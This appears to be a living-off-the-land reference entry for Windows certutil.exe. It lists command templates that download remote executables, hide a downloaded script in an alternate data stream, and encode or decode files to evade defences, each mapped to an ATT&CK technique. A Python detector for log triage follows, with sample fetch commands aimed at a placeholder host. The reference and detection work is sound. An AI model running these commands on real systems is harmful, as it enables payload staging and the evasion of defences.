Certutil.exe

Windows binary used for handling certificates

Download

  1. Download and save executable to disk in the current folder.

    certutil.exe -urlcache -split -f {REMOTEURL:.exe} {PATH:.exe}

    Use case: Download file from Internet
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1105
  2. Download and save executable to disk in the current folder.

    certutil.exe -verifyctl -f -split {REMOTEURL:.exe} {PATH:.exe}

    Use case: Download file from Internet
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1105

Alternate data streams

  1. Download and save a PS1 file to an Alternate Data Stream (ADS).

    certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt

    Use case: Download file from Internet and save it in an NTFS Alternate Data Stream
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1564.004

Encode

  1. Command to encode a file using Base64.

    certutil -encode {PATH} {PATH:.base64}

    Use case: Encode files to evade defensive measures
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1027.013

Decode

  1. Command to decode a Base64 encoded file.

    certutil -decode {PATH:.base64} {PATH}

    Use case: Decode files to evade defensive measures
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1140
  2. Command to decode a hexadecimal-encoded file.

    certutil -decodehex {PATH:.hex} {PATH}

    Use case: Decode files to evade defensive measures
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1140
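
For triage of process-creation logs, the following added example (not part of the original entry) maps a certutil command line to the functions and ATT&CK techniques listed above. The sample command lines, the `example.test` host and the rule that a download needs a URL operand are assumptions made for illustration.

```python
import re

# Verb -> (function, ATT&CK technique), as listed in the entries on this page.
VERBS = {
    "urlcache": ("Download", "T1105"),
    "verifyctl": ("Download", "T1105"),
    "encode": ("Encode", "T1027.013"),
    "decode": ("Decode", "T1140"),
    "decodehex": ("Decode", "T1140"),
}
ADS = ("Alternate data streams", "T1564.004")
TOKEN = re.compile(r'"[^"]*"|\S+')
URL = re.compile(r"^(?:https?|ftp)://", re.I)
# path:stream, where the colon is not just the drive-letter separator.
STREAM = re.compile(r"^(?:[A-Za-z]:[^:]*|[^:]{2,}):[^\\/]+$")

def classify(cmdline):
    """Return the sorted (function, technique) pairs a certutil command line matches."""
    # Double quotes are dropped wherever they occur in a token before matching.
    tokens = [t.replace('"', "") for t in TOKEN.findall(cmdline)]
    image = re.split(r"[\\/]", tokens[0])[-1].lower() if tokens else ""
    if image not in ("certutil", "certutil.exe"):
        return []
    args = [a for a in tokens[1:] if a]
    # certutil accepts both "-verb" and "/verb", in any letter case.
    verbs = {a[1:].lower() for a in args if a[0] in "-/"}
    operands = [a for a in args if a[0] not in "-/"]
    has_url = any(URL.match(o) for o in operands)
    hits = set()
    for verb in verbs & set(VERBS):
        # Assumption: without a URL operand the download verbs touch only local or cached data.
        if VERBS[verb][0] != "Download" or has_url:
            hits.add(VERBS[verb])
    paths = [o for o in operands if not URL.match(o)]
    if ("Download", "T1105") in hits and paths and STREAM.match(paths[-1]):
        hits.add(ADS)
    return sorted(hits)

# Constructed process-creation command lines (example.test is a placeholder host).
SAMPLES = [
    r"certutil.exe -urlcache -split -f http://example.test/a.exe a.exe",
    r'C:\Windows\System32\CertUtil.exe /verifyctl /f /split "https://example.test/a.exe" out.exe',
    r"certutil -urlcache -f http://example.test/s.ps1 C:\Users\Public\notes.txt:ttt",
    r"certutil -decodehex payload.hex payload.bin",
    r"certutil -urlcache *",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), "<-", line)
```

Matching is on the image file name and the verb only, so it complements rather than replaces rules keyed on the original file name or on network telemetry.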